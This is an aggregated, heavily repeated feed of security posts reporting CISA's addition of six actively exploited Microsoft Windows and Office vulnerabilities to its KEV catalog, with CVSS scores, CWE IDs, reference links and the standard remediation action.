- Name: Microsoft Windows Improper Privilege Management Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21533 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21533
#SecDB #InfoSec #CVE #CISA_KEV #cisa_20260210 #cisa20260210 #cve_2026_21510 #cve_2026_21513 #cve_2026_21514 #cve_2026_21519 #cve_2026_21525 #cve_2026_21533 #cve202621510 #cve202621513 #cve202621514 #cve202621519 #cve202621525 #cve202621533
##CISA has updated the KEV catalogue, and Microsoft is the winner.
- CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21514
- CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21519
- CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21533
- CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21510
- CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21525
CVE-2026-21513: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21513
More:
CISA Releases Guide to Help Critical Infrastructure Users Adopt More Secure Communication https://www.cisa.gov/news-events/news/cisa-releases-guide-help-critical-infrastructure-users-adopt-more-secure-communication
Poland Energy Sector Cyber Incident Highlights OT and ICS Security Gaps https://www.cisa.gov/news-events/alerts/2026/02/10/poland-energy-sector-cyber-incident-highlights-ot-and-ics-security-gaps #CISA #infosec #Microsoft #vulnerability
##CVE ID: CVE-2026-21514
Vendor: Microsoft
Product: Office
Date Added: 2026-02-10
Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21514 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21514
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2026-21514
‼️ CISA has added 6 vulnerabilities to the KEV Catalog
CVE-2026-21513: Microsoft Internet Explorer Protection Mechanism Failure Vulnerability: Microsoft Internet Explorer contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability: Microsoft Windows Remote Access Connection Manager contains a NULL pointer dereference that could allow an unauthorized attacker to deny service locally.
CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability: Microsoft Windows Shell contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability: Microsoft Windows Remote Desktop Services contains an improper privilege management vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability: Microsoft Desktop Windows Manager contains a type confusion vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability: Microsoft Office Word contains a reliance on untrusted inputs in a security decision vulnerability that could allow an authorized attacker to elevate privileges locally.
##🟠 CVE-2026-21514 - High (7.8)
Reliance on untrusted inputs in a security decision in Microsoft Office Word allows an unauthorized attacker to bypass a security feature locally.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21514/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔐 CVE-2026-21514
CVE-2026-21514
Reliance on untrusted inputs in a security decision in Microsoft Office Word allows an unauthorized attacker to bypass a security feature locally.
📊 CVSS Score: 7.8
⚠️ Severity: High
🚨 Exploited: true
📅 Published: 10.02.2026, 18:16
🏷️ Aliases: CVE-2026-21514
🛡️ CWE: CWE-807
🔗 CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H (secure@microsoft.com)
📚 References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21514 https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-21514
CISA has updated the KEV catalogue, and Microsoft is the winner.
- CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21514
- CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21519
- CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21533
- CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21510
- CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21525
CVE-2026-21513: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21513
More:
CISA Releases Guide to Help Critical Infrastructure Users Adopt More Secure Communication https://www.cisa.gov/news-events/news/cisa-releases-guide-help-critical-infrastructure-users-adopt-more-secure-communication
Poland Energy Sector Cyber Incident Highlights OT and ICS Security Gaps https://www.cisa.gov/news-events/alerts/2026/02/10/poland-energy-sector-cyber-incident-highlights-ot-and-ics-security-gaps #CISA #infosec #Microsoft #vulnerability
##CVE ID: CVE-2026-21514
Vendor: Microsoft
Product: Office
Date Added: 2026-02-10
Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21514 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21514
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2026-21514
‼️ CISA has added 6 vulnerabilities to the KEV Catalog
CVE-2026-21513: Microsoft Internet Explorer Protection Mechanism Failure Vulnerability: Microsoft Internet Explorer contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability: Microsoft Windows Remote Access Connection Manager contains a NULL pointer dereference that could allow an unauthorized attacker to deny service locally.
CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability: Microsoft Windows Shell contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability: Microsoft Windows Remote Desktop Services contains an improper privilege management vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability: Microsoft Desktop Windows Manager contains a type confusion vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability: Microsoft Office Word contains a reliance on untrusted inputs in a security decision vulnerability that could allow an authorized attacker to elevate privileges locally.
##updated 2026-02-10T21:31:29
13 posts
age-verification concerns.
- Windows security flaws: multiple 2026 CVEs (Notepad RCE CVE-2026-20841; MSHTML; CVE-2026-21510/13/19/25/33) and ongoing Patch Tuesday updates.
- AI and work: productivity boosts but rising cognitive load and burnout; AI adoption altering job markets and roles.
- Open/indie web and OSS: growing use of Pixelfed, Matrix, Zulip; open-source Discord alternatives (Stoat chat); broader Fediverse/indie-web movement.
- Space/AI funding and policy: [2/3]
🟠 CVE-2026-21510 - High (8.8)
Protection mechanism failure in Windows Shell allows an unauthorized attacker to bypass a security feature over a network.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21510/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔐 CVE-2026-21510
CVE-2026-21510
Protection mechanism failure in Windows Shell allows an unauthorized attacker to bypass a security feature over a network.
📊 CVSS Score: 8.8
⚠️ Severity: High
🚨 Exploited: true
📅 Published: 10.02.2026, 18:16
🏷️ Aliases: CVE-2026-21510
🛡️ CWE: CWE-693
🔗 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H (secure@microsoft.com)
📚 References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21510 https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-21510
🚨 [CISA-2026:0210] CISA Adds 6 Known Exploited Vulnerabilities to Catalog (https://secdb.nttzen.cloud/security-advisory/detail/CISA-2026:0210)
CISA has added 6 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.
⚠️ CVE-2026-21510 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21510)
- Name: Microsoft Windows Shell Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21510 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21510
⚠️ CVE-2026-21513 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21513)
- Name: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2026-21513 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21513
⚠️ CVE-2026-21514 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21514)
- Name: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Office
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21514 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21514
⚠️ CVE-2026-21519 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21519)
- Name: Microsoft Windows Type Confusion Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21519 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21519
⚠️ CVE-2026-21525 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21525)
- Name: Microsoft Windows NULL Pointer Dereference Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21525 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21525
⚠️ CVE-2026-21533 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21533)
- Name: Microsoft Windows Improper Privilege Management Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21533 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21533
#SecDB #InfoSec #CVE #CISA_KEV #cisa_20260210 #cisa20260210 #cve_2026_21510 #cve_2026_21513 #cve_2026_21514 #cve_2026_21519 #cve_2026_21525 #cve_2026_21533 #cve202621510 #cve202621513 #cve202621514 #cve202621519 #cve202621525 #cve202621533
##CISA has updated the KEV catalogue, and Microsoft is the winner.
- CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21514
- CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21519
- CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21533
- CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21510
- CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21525
CVE-2026-21513: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21513
More:
CISA Releases Guide to Help Critical Infrastructure Users Adopt More Secure Communication https://www.cisa.gov/news-events/news/cisa-releases-guide-help-critical-infrastructure-users-adopt-more-secure-communication
Poland Energy Sector Cyber Incident Highlights OT and ICS Security Gaps https://www.cisa.gov/news-events/alerts/2026/02/10/poland-energy-sector-cyber-incident-highlights-ot-and-ics-security-gaps #CISA #infosec #Microsoft #vulnerability
##CVE ID: CVE-2026-21510
Vendor: Microsoft
Product: Windows
Date Added: 2026-02-10
Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21510 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21510
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2026-21510
‼️ CISA has added 6 vulnerabilities to the KEV Catalog
CVE-2026-21513: Microsoft Internet Explorer Protection Mechanism Failure Vulnerability: Microsoft Internet Explorer contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability: Microsoft Windows Remote Access Connection Manager contains a NULL pointer dereference that could allow an unauthorized attacker to deny service locally.
CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability: Microsoft Windows Shell contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability: Microsoft Windows Remote Desktop Services contains an improper privilege management vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability: Microsoft Desktop Windows Manager contains a type confusion vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability: Microsoft Office Word contains a reliance on untrusted inputs in a security decision vulnerability that could allow an authorized attacker to elevate privileges locally.
##🟠 CVE-2026-21510 - High (8.8)
Protection mechanism failure in Windows Shell allows an unauthorized attacker to bypass a security feature over a network.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21510/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔐 CVE-2026-21510
CVE-2026-21510
Protection mechanism failure in Windows Shell allows an unauthorized attacker to bypass a security feature over a network.
📊 CVSS Score: 8.8
⚠️ Severity: High
🚨 Exploited: true
📅 Published: 10.02.2026, 18:16
🏷️ Aliases: CVE-2026-21510
🛡️ CWE: CWE-693
🔗 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H (secure@microsoft.com)
📚 References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21510 https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-21510
CISA has updated the KEV catalogue, and Microsoft is the winner.
- CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21514
- CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21519
- CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21533
- CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21510
- CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21525
CVE-2026-21513: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21513
More:
CISA Releases Guide to Help Critical Infrastructure Users Adopt More Secure Communication https://www.cisa.gov/news-events/news/cisa-releases-guide-help-critical-infrastructure-users-adopt-more-secure-communication
Poland Energy Sector Cyber Incident Highlights OT and ICS Security Gaps https://www.cisa.gov/news-events/alerts/2026/02/10/poland-energy-sector-cyber-incident-highlights-ot-and-ics-security-gaps #CISA #infosec #Microsoft #vulnerability
##CVE ID: CVE-2026-21510
Vendor: Microsoft
Product: Windows
Date Added: 2026-02-10
Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21510 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21510
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2026-21510
‼️ CISA has added 6 vulnerabilities to the KEV Catalog
CVE-2026-21513: Microsoft Internet Explorer Protection Mechanism Failure Vulnerability: Microsoft Internet Explorer contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability: Microsoft Windows Remote Access Connection Manager contains a NULL pointer dereference that could allow an unauthorized attacker to deny service locally.
CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability: Microsoft Windows Shell contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability: Microsoft Windows Remote Desktop Services contains an improper privilege management vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability: Microsoft Desktop Windows Manager contains a type confusion vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability: Microsoft Office Word contains a reliance on untrusted inputs in a security decision vulnerability that could allow an authorized attacker to elevate privileges locally.
##updated 2026-02-10T21:31:29
11 posts
🟠 CVE-2026-21519 - High (7.8)
Access of resource using incompatible type ('type confusion') in Desktop Window Manager allows an authorized attacker to elevate privileges locally.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21519/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔐 CVE-2026-21519
CVE-2026-21519
Access of resource using incompatible type ('type confusion') in Desktop Window Manager allows an authorized attacker to elevate privileges locally.
📊 CVSS Score: 7.8
⚠️ Severity: High
🚨 Exploited: true
📅 Published: 10.02.2026, 18:16
🏷️ Aliases: CVE-2026-21519
🛡️ CWE: CWE-843
🔗 CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H (secure@microsoft.com)
📚 References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21519 https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-21519
🚨 [CISA-2026:0210] CISA Adds 6 Known Exploited Vulnerabilities to Catalog (https://secdb.nttzen.cloud/security-advisory/detail/CISA-2026:0210)
CISA has added 6 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.
⚠️ CVE-2026-21510 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21510)
- Name: Microsoft Windows Shell Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21510 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21510
⚠️ CVE-2026-21513 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21513)
- Name: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2026-21513 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21513
⚠️ CVE-2026-21514 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21514)
- Name: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Office
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21514 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21514
⚠️ CVE-2026-21519 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21519)
- Name: Microsoft Windows Type Confusion Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21519 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21519
⚠️ CVE-2026-21525 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21525)
- Name: Microsoft Windows NULL Pointer Dereference Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21525 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21525
⚠️ CVE-2026-21533 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21533)
- Name: Microsoft Windows Improper Privilege Management Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21533 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21533
#SecDB #InfoSec #CVE #CISA_KEV #cisa_20260210 #cisa20260210 #cve_2026_21510 #cve_2026_21513 #cve_2026_21514 #cve_2026_21519 #cve_2026_21525 #cve_2026_21533 #cve202621510 #cve202621513 #cve202621514 #cve202621519 #cve202621525 #cve202621533
##CISA has updated the KEV catalogue, and Microsoft is the winner.
- CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21514
- CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21519
- CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21533
- CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21510
- CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21525
CVE-2026-21513: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21513
More:
CISA Releases Guide to Help Critical Infrastructure Users Adopt More Secure Communication https://www.cisa.gov/news-events/news/cisa-releases-guide-help-critical-infrastructure-users-adopt-more-secure-communication
Poland Energy Sector Cyber Incident Highlights OT and ICS Security Gaps https://www.cisa.gov/news-events/alerts/2026/02/10/poland-energy-sector-cyber-incident-highlights-ot-and-ics-security-gaps #CISA #infosec #Microsoft #vulnerability
##CVE ID: CVE-2026-21519
Vendor: Microsoft
Product: Windows
Date Added: 2026-02-10
Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21519 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21519
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2026-21519
‼️ CISA has added 6 vulnerabilities to the KEV Catalog
CVE-2026-21513: Microsoft Internet Explorer Protection Mechanism Failure Vulnerability: Microsoft Internet Explorer contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability: Microsoft Windows Remote Access Connection Manager contains a NULL pointer dereference that could allow an unauthorized attacker to deny service locally.
CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability: Microsoft Windows Shell contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability: Microsoft Windows Remote Desktop Services contains an improper privilege management vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability: Microsoft Desktop Windows Manager contains a type confusion vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability: Microsoft Office Word contains a reliance on untrusted inputs in a security decision vulnerability that could allow an authorized attacker to elevate privileges locally.
##🟠 CVE-2026-21519 - High (7.8)
Access of resource using incompatible type ('type confusion') in Desktop Window Manager allows an authorized attacker to elevate privileges locally.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21519/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔐 CVE-2026-21519
CVE-2026-21519
Access of resource using incompatible type ('type confusion') in Desktop Window Manager allows an authorized attacker to elevate privileges locally.
📊 CVSS Score: 7.8
⚠️ Severity: High
🚨 Exploited: true
📅 Published: 10.02.2026, 18:16
🏷️ Aliases: CVE-2026-21519
🛡️ CWE: CWE-843
🔗 CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H (secure@microsoft.com)
📚 References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21519 https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-21519
CISA has updated the KEV catalogue, and Microsoft is the winner.
- CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21514
- CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21519
- CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21533
- CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21510
- CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21525
CVE-2026-21513: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21513
More:
CISA Releases Guide to Help Critical Infrastructure Users Adopt More Secure Communication https://www.cisa.gov/news-events/news/cisa-releases-guide-help-critical-infrastructure-users-adopt-more-secure-communication
Poland Energy Sector Cyber Incident Highlights OT and ICS Security Gaps https://www.cisa.gov/news-events/alerts/2026/02/10/poland-energy-sector-cyber-incident-highlights-ot-and-ics-security-gaps #CISA #infosec #Microsoft #vulnerability
##CVE ID: CVE-2026-21519
Vendor: Microsoft
Product: Windows
Date Added: 2026-02-10
Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21519 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21519
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2026-21519
‼️ CISA has added 6 vulnerabilities to the KEV Catalog
CVE-2026-21513: Microsoft Internet Explorer Protection Mechanism Failure Vulnerability: Microsoft Internet Explorer contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability: Microsoft Windows Remote Access Connection Manager contains a NULL pointer dereference that could allow an unauthorized attacker to deny service locally.
CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability: Microsoft Windows Shell contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability: Microsoft Windows Remote Desktop Services contains an improper privilege management vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability: Microsoft Desktop Windows Manager contains a type confusion vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability: Microsoft Office Word contains a reliance on untrusted inputs in a security decision vulnerability that could allow an authorized attacker to elevate privileges locally.
##updated 2026-02-10T21:31:29
11 posts
2 repos
🟠 CVE-2026-21533 - High (7.8)
Improper privilege management in Windows Remote Desktop allows an authorized attacker to elevate privileges locally.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21533/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔐 CVE-2026-21533
CVE-2026-21533
Improper privilege management in Windows Remote Desktop allows an authorized attacker to elevate privileges locally.
📊 CVSS Score: 7.8
⚠️ Severity: High
🚨 Exploited: true
📅 Published: 10.02.2026, 18:16
🏷️ Aliases: CVE-2026-21533
🛡️ CWE: CWE-269
🔗 CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H (secure@microsoft.com)
